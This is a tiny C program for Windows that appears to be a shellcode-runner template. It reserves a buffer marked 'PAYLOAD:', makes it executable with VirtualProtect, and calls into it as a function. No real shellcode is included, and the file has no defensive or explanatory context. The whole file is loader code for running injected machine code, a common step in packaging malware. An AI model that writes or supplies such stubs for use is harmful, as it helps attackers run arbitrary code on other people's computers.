1#include <windows.h> 2 3#define SCSIZE 4096 4char bPayload[SCSIZE] = "PAYLOAD:"; 5 6void main() { 7 DWORD dwOldProtect; 8 VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect); 9 (*(void (*)()) bPayload)(); 10 return; 11} 12 13